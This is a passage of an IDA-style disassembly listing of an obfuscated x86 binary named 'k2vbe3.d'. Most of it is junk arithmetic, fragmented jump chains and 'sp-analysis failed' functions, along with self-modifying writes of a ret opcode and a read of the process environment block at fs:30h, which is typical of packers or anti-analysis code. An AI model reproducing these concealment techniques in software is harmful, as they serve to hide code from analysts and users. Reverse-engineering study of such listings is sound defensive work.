loc_451D17:				; CODE XREF: k2vbe3.d:0044FDE6j
		xor	edi, ds:4000F2h
		js	loc_4510F2
; START	OF FUNCTION CHUNK FOR sub_454354

loc_451D23:				; CODE XREF: sub_454354+4BFBj
		jmp	loc_440CB5
; END OF FUNCTION CHUNK	FOR sub_454354
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4409D3

loc_451D28:				; CODE XREF: sub_4409D3+7j
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_4409D3
; ---------------------------------------------------------------------------
		jnb	loc_4465E1
		test	ebx, esi
		jmp	loc_4510EC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4468FE

loc_451D3A:				; CODE XREF: sub_4468FE:loc_45367Fj
		sbb	eax, 0D63A7A69h
		jmp	loc_4432F3
; END OF FUNCTION CHUNK	FOR sub_4468FE
; ---------------------------------------------------------------------------

locret_451D45:				; CODE XREF: k2vbe3.d:00459FC2j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C3A9

loc_451D46:				; CODE XREF: sub_43C3A9+1E52Dj
		jnb	loc_448997

loc_451D4C:				; CODE XREF: k2vbe3.d:loc_457E79j
		push	25EA4E29h
		pop	eax
		sub	eax, 3DD9E6E7h
		rol	eax, 1Ah
		and	eax, 1BD8F8BEh
		jmp	loc_44F890
; END OF FUNCTION CHUNK	FOR sub_43C3A9
; ---------------------------------------------------------------------------

loc_451D66:				; DATA XREF: sub_4580F6+Co
		pop	ecx
		lea	eax, loc_452F21
		mov	byte ptr [eax],	0C3h
		jmp	loc_441E1E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4511F7

loc_451D75:				; CODE XREF: sub_4511F7:loc_452F21j
		pop	edx
		push	offset loc_43CFD3
		jmp	nullsub_134
; END OF FUNCTION CHUNK	FOR sub_4511F7
; ---------------------------------------------------------------------------
		add	ebx, 0D0C9CD01h
		jmp	sub_450F71
; ---------------------------------------------------------------------------

loc_451D8B:				; CODE XREF: k2vbe3.d:0044E1CCj
		jz	loc_458731

loc_451D91:				; CODE XREF: k2vbe3.d:0044E1B2j
		sub	eax, 0F19C93B4h
		xor	eax, 785FA823h
		call	sub_4553CC
		mov	ds:dword_41E1B8, eax
		lea	eax, nullsub_518
		call	sub_45504A
; START	OF FUNCTION CHUNK FOR sub_44B2D7

loc_451DB3:				; CODE XREF: sub_44B2D7+D3A7j
		jmp	sub_444DA9
; END OF FUNCTION CHUNK	FOR sub_44B2D7
; ---------------------------------------------------------------------------

loc_451DB8:				; CODE XREF: k2vbe3.d:00454AB6j
		jmp	loc_43E07B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EFC9

loc_451DBD:				; CODE XREF: sub_43EFC9+F50j
		jmp	nullsub_18
; END OF FUNCTION CHUNK	FOR sub_43EFC9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456666

loc_451DC2:				; CODE XREF: sub_456666-C394j
		mov	eax, ds:dword_445A48[eax*4]
		mov	[ebp-8], eax

loc_451DCC:				; CODE XREF: sub_456666-11961j
					; sub_456666-624Dj ...
		call	sub_450359

loc_451DD1:				; CODE XREF: k2vbe3.d:00453940j
		jo	loc_457118
		pushf
; END OF FUNCTION CHUNK	FOR sub_456666

; =============== S U B	R O U T	I N E =======================================



sub_451DD8	proc near		; CODE XREF: sub_45B4EE-DB05p
		xchg	edx, [esp+0]
		pop	edx
		or	edx, esi
		pop	esi
		jmp	loc_44BE2B
sub_451DD8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_451DE4:				; CODE XREF: sub_440C94:loc_450005j
		jl	loc_44EE83

loc_451DEA:				; CODE XREF: sub_45B454-B69j
		jmp	loc_45020A
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------
		jg	loc_44B6FD
		cmp	edi, 0B8630E2Dh
		jmp	loc_44EE77

; =============== S U B	R O U T	I N E =======================================



sub_451E00	proc near		; CODE XREF: sub_442700+4p
					; k2vbe3.d:004463FAj

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044374E SIZE 00000014 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	esp, ebp
		xchg	esi, [esp-4+arg_0]
		mov	ebp, esi
		pop	esi
		call	sub_44A306

loc_451E11:				; CODE XREF: sub_44D316-6AD6j
		jmp	loc_44374E
sub_451E00	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4481FA

loc_451E16:				; CODE XREF: sub_4481FA+3712j
		not	ebp
		jo	loc_43E52F
		jmp	loc_441B29
; END OF FUNCTION CHUNK	FOR sub_4481FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B999

loc_451E23:				; CODE XREF: sub_44B999+1F8Ej
		jge	loc_440F71
		push	ebx
		test	edi, 32916787h
		jmp	loc_44C9F3
; END OF FUNCTION CHUNK	FOR sub_44B999
; ---------------------------------------------------------------------------
		or	esi, edi
		jmp	sub_43CF1B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4481FA

loc_451E3C:				; CODE XREF: sub_4481FA+2A04j
		push	edx
		push	88043E0Bh
		pop	edx
		or	edx, 10DADF86h
		xor	edx, 1D54F77Dh
		sub	edx, 0EFE2CBD3h
		jmp	loc_43EC00
; END OF FUNCTION CHUNK	FOR sub_4481FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441E66

loc_451E5A:				; CODE XREF: sub_441E66+10j
		pop	ecx
		or	esi, 0F38945Bh
		add	esi, 51058115h
		mov	[esi], eax
		jmp	loc_453052
; END OF FUNCTION CHUNK	FOR sub_441E66
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44128B

loc_451E6E:				; CODE XREF: sub_44128B-84Bj
		xchg	edx, [esp+4+var_4]
		mov	ebp, esp
		add	esp, 0FFFFFFECh
		cmp	ds:dword_44BD18, 0
		jnz	loc_44540D
		jmp	loc_43E465
; END OF FUNCTION CHUNK	FOR sub_44128B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B999

loc_451E88:				; CODE XREF: sub_44B999:loc_44C361j
		or	ecx, 15C489F6h
		add	ecx, 0A0758E45h
		xchg	ecx, [esp-4+arg_0]
		jmp	sub_455F6B
; END OF FUNCTION CHUNK	FOR sub_44B999
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D023

loc_451E9C:				; CODE XREF: sub_43D023+11FE2j
		jo	loc_4550BB
		cmp	ebp, 0BD3CAF2Eh
		jmp	loc_446B47
; END OF FUNCTION CHUNK	FOR sub_43D023
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C82E

loc_451EAD:				; CODE XREF: k2vbe3.d:loc_43D91Cj
					; sub_43D7A9+A27Ej ...
		push	offset sub_457865
		jmp	loc_456486
; END OF FUNCTION CHUNK	FOR sub_43C82E

; =============== S U B	R O U T	I N E =======================================



sub_451EB7	proc near		; CODE XREF: k2vbe3.d:004475F4j
					; sub_44C6EC+30E5p

; FUNCTION CHUNK AT 0043DBC9 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00440831 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004440B0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446C52 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044A5E1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C0B6 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044C766 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044D044 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044EED0 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0044FAF6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453307 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453E85 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045693E SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0045B1A7 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0045C2A3 SIZE 0000001D BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		lea	edx, [ebp-14h]
		mov	eax, offset dword_4411F8
		call	sub_45B74D
		lea	eax, [ebp-14h]
		jmp	loc_45693E
sub_451EB7	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45496E

loc_451ED0:				; CODE XREF: sub_45496E:loc_45AF8Dj
		jno	loc_444A9F
		sub	eax, 92A1B192h
		ror	eax, 9
		add	eax, 0AB67E9E7h
		jmp	loc_4505B0
; END OF FUNCTION CHUNK	FOR sub_45496E

; =============== S U B	R O U T	I N E =======================================



sub_451EEA	proc near		; CODE XREF: sub_448417-4FEAp
					; k2vbe3.d:00456C30j

arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 0043C788 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043E2C9 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043E8D3 SIZE 00000001 BYTES
; FUNCTION CHUNK AT 004449A2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AD58 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044AF81 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044F724 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00450F14 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045252F SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00458214 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459D85 SIZE 00000005 BYTES

		xchg	esi, [esp+0]

loc_451EED:				; CODE XREF: k2vbe3.d:loc_44FF1Aj
		pop	esi
		xor	esi, 0ACD9C9A8h
		add	esi, ebp
		add	esi, 2CDB7A1Dh
		mov	[esi], eax
		jmp	loc_43E2C9
sub_451EEA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_451F03:				; CODE XREF: k2vbe3.d:00449ACCj
		jl	loc_446DBD
		popf
		xchg	ebx, [esp]
		pop	ebx
		mov	eax, 131h
		call	sub_4527CB
; START	OF FUNCTION CHUNK FOR sub_449372

loc_451F18:				; CODE XREF: sub_449372-65j
		jmp	loc_44C7DD
; END OF FUNCTION CHUNK	FOR sub_449372
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F028

loc_451F1D:				; CODE XREF: sub_44F028-F28Bj
		jmp	nullsub_300
; END OF FUNCTION CHUNK	FOR sub_44F028
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_148. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C27A

loc_451F23:				; CODE XREF: k2vbe3.d:loc_44AB02j
					; sub_45C27A-AA57j
		jmp	loc_440DE1
; END OF FUNCTION CHUNK	FOR sub_45C27A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B4E4

loc_451F28:				; CODE XREF: sub_44B4E4+9j
		jmp	loc_446492
; END OF FUNCTION CHUNK	FOR sub_44B4E4

; =============== S U B	R O U T	I N E =======================================



sub_451F2D	proc near		; DATA XREF: k2vbe3.d:00444776o
		cmp	dword ptr [ebp-0Ch], 0
		jz	loc_456B97
		jmp	loc_4469DC
sub_451F2D	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E69

loc_451F3C:				; CODE XREF: sub_454E69-FCB9j
		push	edi
		push	6ADA4A61h
		pop	edi
		and	edi, 63708B6Ah
		or	edi, 0DA9F8A50h
		add	edi, 2384E7DBh
		add	edi, ebp
		jmp	loc_4534DA
; END OF FUNCTION CHUNK	FOR sub_454E69
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E135

loc_451F5C:				; CODE XREF: sub_44DAF6:loc_4424EFj
					; sub_45A323-F684j ...
		call	sub_44001D

loc_451F61:				; CODE XREF: k2vbe3.d:0044CEADj
		cdq

loc_451F62:				; CODE XREF: k2vbe3.d:loc_44CE9Aj
		and	ecx, 7D1AA288h
		xor	ecx, 0DE2AB1CAh
		rol	ecx, 0Fh
		add	ecx, 0F7A41F30h
		xchg	ecx, [esp+0]
		jmp	loc_457EE6
; END OF FUNCTION CHUNK	FOR sub_43E135

; =============== S U B	R O U T	I N E =======================================



sub_451F7F	proc near		; DATA XREF: sub_44B495:loc_451164o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004452C6 SIZE 0000001A BYTES

		push	ecx
		push	6F275124h
		pop	ecx
		and	ecx, 0AE47F324h
		jmp	loc_4452C6
sub_451F7F	endp


; =============== S U B	R O U T	I N E =======================================



sub_451F91	proc near		; CODE XREF: k2vbe3.d:0043DA97j
					; sub_443E9D:loc_456456p

; FUNCTION CHUNK AT 00443B77 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A9B8 SIZE 00000008 BYTES

		xchg	edx, [esp+0]
		pop	edx
		pop	ecx
		lea	eax, sub_443E9D
		jmp	loc_44A9B8
sub_451F91	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	ds:off_41E06C, eax
		lea	eax, sub_456767

loc_451FAD:				; CODE XREF: k2vbe3.d:004558CCj
		mov	byte ptr [eax],	0C3h
		jmp	sub_456767
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456767

loc_451FB5:				; CODE XREF: sub_451EEA:loc_44AF81j
					; sub_456767+1j
		mov	eax, [esp+0]
		push	edx
		push	ecx
		jmp	loc_450FEC
; END OF FUNCTION CHUNK	FOR sub_456767
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ED3C

loc_451FBF:				; CODE XREF: sub_44ED3C+D52Ej
		jo	loc_453648
		shr	esi, 0Dh
		jmp	loc_45617A
; END OF FUNCTION CHUNK	FOR sub_44ED3C
; ---------------------------------------------------------------------------

loc_451FCD:				; CODE XREF: k2vbe3.d:0044A041j
		pop	ecx
; START	OF FUNCTION CHUNK FOR sub_443EF6

loc_451FCE:				; CODE XREF: sub_443EF6:loc_447B89j
		xor	eax, 0D0D975F4h
		add	eax, 376C559Dh
		xchg	eax, [esp+4+var_4]
		jmp	loc_44B028
; END OF FUNCTION CHUNK	FOR sub_443EF6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B3E

loc_451FE2:				; CODE XREF: sub_444B3E:loc_4402B2j
		jz	loc_44B7B6
		jmp	loc_446D8E
; END OF FUNCTION CHUNK	FOR sub_444B3E
; ---------------------------------------------------------------------------
		test	esi, ecx
		jmp	loc_443E1C
; ---------------------------------------------------------------------------

loc_451FF4:				; DATA XREF: sub_45A252:loc_44B283o
		mov	eax, 61h
		push	ebx
		mov	ebx, ecx
		xchg	ebx, [esp]
		push	4CF429C4h
		pop	ecx
		jmp	loc_4441B6
; ---------------------------------------------------------------------------
		ror	edi, 6
		jmp	sub_45156D
; ---------------------------------------------------------------------------
		push	145941AEh
		pop	eax
		sub	eax, 6CC56E7Fh
		or	eax, 22A3BD94h
		and	eax, 0B64DA9DCh
		js	loc_4598BA
; START	OF FUNCTION CHUNK FOR sub_45BA45

loc_452030:				; CODE XREF: sub_45BA45+22j
		jmp	loc_44B214
; END OF FUNCTION CHUNK	FOR sub_45BA45
; ---------------------------------------------------------------------------
		xor	ebp, edi
		jmp	loc_43F283
; ---------------------------------------------------------------------------

loc_45203C:				; CODE XREF: k2vbe3.d:00447CDDj
		xor	edi, 596CC450h
		cmp	eax, edi
		jmp	loc_4439EB
; ---------------------------------------------------------------------------

loc_452049:				; CODE XREF: k2vbe3.d:0043F735j
		jz	loc_44EA9E
		jmp	loc_43CEAA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_536. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A21D

loc_452055:				; CODE XREF: sub_45A21D-28FEj
		jmp	loc_44493A
; END OF FUNCTION CHUNK	FOR sub_45A21D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DD31

loc_45205A:				; CODE XREF: sub_44DD31-8975j
		jge	loc_43ECEE

loc_452060:				; CODE XREF: k2vbe3.d:0044EA6Dj
		jmp	loc_44896A
; END OF FUNCTION CHUNK	FOR sub_44DD31
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449A11

loc_452065:				; CODE XREF: sub_4553CC:loc_4490A5j
					; sub_449A11+Cj
		jmp	nullsub_122
; END OF FUNCTION CHUNK	FOR sub_449A11
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442053

loc_45206A:				; CODE XREF: sub_442053+Bj
		jmp	loc_44C148
; END OF FUNCTION CHUNK	FOR sub_442053
; ---------------------------------------------------------------------------
		cmp	eax, 0FC6ED939h
		jmp	loc_446AF7
; ---------------------------------------------------------------------------

loc_45207A:				; CODE XREF: k2vbe3.d:00448ED3j
		shl	edi, 14h
		push	ebx
; START	OF FUNCTION CHUNK FOR sub_45AD42

loc_45207E:				; CODE XREF: sub_45AD42:loc_44198Cj
		add	ecx, 0C9331713h
		add	ecx, ebp
		jmp	loc_43E7BB
; END OF FUNCTION CHUNK	FOR sub_45AD42
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D59D

loc_45208B:				; CODE XREF: sub_44D59D-8CC7j
		jno	loc_43F3AF
		pushf
; END OF FUNCTION CHUNK	FOR sub_44D59D

; =============== S U B	R O U T	I N E =======================================



sub_452092	proc near		; CODE XREF: sub_44D59D:loc_453A00j

arg_0		= dword	ptr  4
arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 0043D1AD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DB60 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F685 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00441836 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00448047 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A86E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CC76 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044D7FD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FE14 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00451286 SIZE 00000001 BYTES
; FUNCTION CHUNK AT 004514DD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455ED2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457E59 SIZE 00000020 BYTES

		push	ebx
		push	3AF7B359h
		pop	ebx
		sub	ebx, 0F6D6F728h
		jmp	loc_43D1AD
sub_452092	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44660F

loc_4520A4:				; CODE XREF: sub_44660F+11DD2j
		sub	al, 99h
		push	offset sub_44866A
		jmp	nullsub_273
; END OF FUNCTION CHUNK	FOR sub_44660F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FF34

loc_4520B0:				; CODE XREF: sub_44FF34+3F1j
					; sub_455BEA:loc_45B162j
		call	sub_4436CE

loc_4520B5:				; CODE XREF: sub_454E69-391Dj
		mov	edx, 19CFC62Bh
		call	sub_45B20A
		push	eax
		ror	eax, 17h
; END OF FUNCTION CHUNK	FOR sub_44FF34
; START	OF FUNCTION CHUNK FOR sub_454639

loc_4520C3:				; CODE XREF: sub_454639:loc_451338j
		jmp	loc_43E839
; END OF FUNCTION CHUNK	FOR sub_454639
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44660F

loc_4520C8:				; CODE XREF: sub_44660F+A920j
		jnz	loc_4582F9
		jmp	loc_4554ED
; END OF FUNCTION CHUNK	FOR sub_44660F
; ---------------------------------------------------------------------------
		call	sub_44AA92	; InterlockedDecrement
; START	OF FUNCTION CHUNK FOR sub_44B2D7

loc_4520D8:				; CODE XREF: sub_44B2D7:loc_447398j
		jnz	loc_4473CB
		jmp	loc_451B9E
; END OF FUNCTION CHUNK	FOR sub_44B2D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4575BD

loc_4520E3:				; CODE XREF: sub_4575BD:loc_448317j
					; k2vbe3.d:00454320j
		xor	edx, 428E8A77h
		add	edx, 0D14111BDh
		add	edx, ebp
		add	edx, 324978B3h
		mov	[edx], al
		jmp	loc_446BFF
; END OF FUNCTION CHUNK	FOR sub_4575BD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_346. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A679

loc_4520FF:				; CODE XREF: sub_44A679+6j
		jmp	loc_43F8DE
; END OF FUNCTION CHUNK	FOR sub_44A679
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C041

loc_452104:				; CODE XREF: sub_45C041:loc_44BCEEj
		jnz	loc_44D195
		jmp	loc_4506BE
; END OF FUNCTION CHUNK	FOR sub_45C041
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_45210F:				; CODE XREF: sub_45A323-1B7D2j
		jo	loc_45A768

loc_452115:				; CODE XREF: sub_45A323:loc_4404C5j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_43EFE3
		jmp	loc_4448DC
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------

locret_452126:				; CODE XREF: k2vbe3.d:loc_44DC79j
		retn
; ---------------------------------------------------------------------------

loc_452127:				; CODE XREF: k2vbe3.d:00445104j
		jmp	loc_44381C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45762D

loc_45212C:				; CODE XREF: sub_45762D:loc_4417D0j
		push	178F5BB7h
		xchg	eax, [esp+0]
		mov	ebx, eax
		pop	eax
		add	ebx, 7E7BBC30h
		jmp	loc_45726B
; END OF FUNCTION CHUNK	FOR sub_45762D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_263. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445FE0

loc_452143:				; CODE XREF: sub_445FE0+15ADDj
		jmp	loc_44A2A5
; END OF FUNCTION CHUNK	FOR sub_445FE0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451087

loc_452148:				; CODE XREF: sub_451087+Fj
		jmp	nullsub_124
; END OF FUNCTION CHUNK	FOR sub_451087
; ---------------------------------------------------------------------------

loc_45214D:				; CODE XREF: k2vbe3.d:004446E1j
		jmp	locret_4433DA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456471

loc_452152:				; CODE XREF: sub_456471:loc_441926j
		xor	ecx, 4F64BB0Dh
		add	ecx, ebp
		add	ecx, 7DE5D95Ah
		push	offset loc_444E4B
		jmp	nullsub_207
; END OF FUNCTION CHUNK	FOR sub_456471
; ---------------------------------------------------------------------------

loc_45216A:				; CODE XREF: k2vbe3.d:00447965j
		jnz	loc_43F93C
; START	OF FUNCTION CHUNK FOR sub_43FECA

loc_452170:				; CODE XREF: sub_43FECA+169E9j
		jmp	loc_44B79A
; END OF FUNCTION CHUNK	FOR sub_43FECA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BDF

loc_452175:				; CODE XREF: sub_443BDF+1656j
		jmp	loc_45401B
; END OF FUNCTION CHUNK	FOR sub_443BDF
; ---------------------------------------------------------------------------
		mov	[ebx], esi
		jo	loc_44F3E9
		or	edi, esi
		jmp	loc_43F93C
; ---------------------------------------------------------------------------

loc_452189:				; CODE XREF: k2vbe3.d:0044EA91j
		add	ecx, 0D1B5565Eh
; START	OF FUNCTION CHUNK FOR sub_440D7B

loc_45218F:				; CODE XREF: sub_440D7B+DD04j
		rol	eax, 0Eh
		sub	eax, 176F8F05h
		xor	eax, 5E0855B4h
		jmp	loc_441816
; END OF FUNCTION CHUNK	FOR sub_440D7B
; ---------------------------------------------------------------------------

loc_4521A3:				; CODE XREF: k2vbe3.d:0045049Cj
		jnb	loc_4540AF
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_4521A9:				; CODE XREF: k2vbe3.d:loc_43CA0Fj
					; sub_457D4B-130E4j ...
		push	34069F64h
		xchg	ebp, [esp+8+var_8]
		mov	eax, ebp
		pop	ebp
		and	eax, 0BCBD8804h
		cmp	eax, 8502FB5Ah

loc_4521C0:				; CODE XREF: k2vbe3.d:0045959Aj
		jmp	loc_43CA00
; END OF FUNCTION CHUNK	FOR sub_457D4B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_530. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455BEA

loc_4521C6:				; CODE XREF: sub_455BEA-F7B0j
		jmp	loc_44B9F4
; END OF FUNCTION CHUNK	FOR sub_455BEA

; =============== S U B	R O U T	I N E =======================================



sub_4521CB	proc near		; CODE XREF: k2vbe3.d:0043F153j
					; sub_455CC3+1p

var_10		= dword	ptr -10h

; FUNCTION CHUNK AT 0045768F SIZE 00000017 BYTES

		xchg	edx, [esp+0]
		pop	edx
		mov	ebp, esp
		jnz	sub_4527C2
		add	esp, 0FFFFFFF0h
		push	eax
		push	0E24EFFFCh
		pop	eax
		jmp	loc_45768F
sub_4521CB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444966

loc_4521E6:				; CODE XREF: sub_444966:loc_43FBC0j
		pop	eax
		rol	eax, 18h
		cmp	eax, 4262E3E1h
		jmp	loc_449337
; END OF FUNCTION CHUNK	FOR sub_444966
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_121. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4580DF

loc_4521F6:				; CODE XREF: sub_4580DF:loc_448E4Cj
		jnz	loc_454BAB
		jmp	loc_44AC04
; END OF FUNCTION CHUNK	FOR sub_4580DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4590BA

loc_452201:				; CODE XREF: sub_4590BA:loc_43E25Aj
		call	sub_43C82E
		call	sub_4524DE

loc_45220B:				; CODE XREF: k2vbe3.d:0045082Fj
		jmp	loc_44A33A
; END OF FUNCTION CHUNK	FOR sub_4590BA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45101A

loc_452210:				; CODE XREF: sub_45101A:loc_43DD2Cj
					; sub_43F7AC+EC37j
		jmp	loc_446933
; END OF FUNCTION CHUNK	FOR sub_45101A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B20A

loc_452215:				; CODE XREF: sub_45B20A-72DCj
		jbe	loc_43FDB7
		popf
		shr	edi, 2
		adc	ecx, edi
		jmp	loc_4467B6
; END OF FUNCTION CHUNK	FOR sub_45B20A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_452226:				; CODE XREF: sub_44D0D5:loc_44F4E4j
		and	edx, 13CF8E51h
		add	edx, 0BE281B96h
		xor	eax, edx
		pop	edx
		ror	eax, 11h
		jmp	loc_44B9FB
; END OF FUNCTION CHUNK	FOR sub_44D0D5
; ---------------------------------------------------------------------------
		jmp	loc_44ED37
; ---------------------------------------------------------------------------

loc_452242:				; CODE XREF: k2vbe3.d:00450172j
		js	loc_448CF7
		mov	eax, large fs:30h
		push	esi
		jmp	loc_455AE6

; =============== S U B	R O U T	I N E =======================================



sub_452255	proc near		; CODE XREF: k2vbe3.d:0043EF5Bj
					; sub_43ED1F+2F4p

; FUNCTION CHUNK AT 0044A5F6 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044C956 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		xor	eax, 7AB5DD61h
		push	edx
		pushf
		push	7DD7E0D2h
		pop	edx
		jmp	loc_44C956
sub_452255	endp


; =============== S U B	R O U T	I N E =======================================



sub_45226C	proc near		; DATA XREF: sub_443E9D+125CAo
		call	sub_45B20A
		push	eax
		push	offset loc_452FDB
		jmp	nullsub_206
sub_45226C	endp


; =============== S U B	R O U T	I N E =======================================



sub_45227C	proc near		; DATA XREF: sub_4412B5+5o

; FUNCTION CHUNK AT 0044C65A SIZE 0000000A BYTES

		push	ecx
		push	648F71BFh
		pop	ecx
		xor	ecx, 0E8CCF6DAh
		jmp	loc_44C65A
sub_45227C	endp

; ---------------------------------------------------------------------------

loc_45228E:				; DATA XREF: sub_44866A-558Bo
		add	edx, 14h
		call	sub_44CA73
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_452296:				; CODE XREF: sub_44C90E+AA3Dj
		jmp	loc_43C25D
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45890F

loc_45229B:				; CODE XREF: sub_45890F-EB72j
		test	ecx, 20000h

loc_4522A1:				; CODE XREF: k2vbe3.d:0044A02Ej
		jmp	loc_451B84
; END OF FUNCTION CHUNK	FOR sub_45890F
; ---------------------------------------------------------------------------

loc_4522A6:				; DATA XREF: sub_453FF1+2197o
		xchg	edi, [esp]
		mov	ecx, edi
		pop	edi
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_4522AE:				; CODE XREF: k2vbe3.d:00444652j
		mov	esp, ebp
		jmp	loc_444D92
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D298

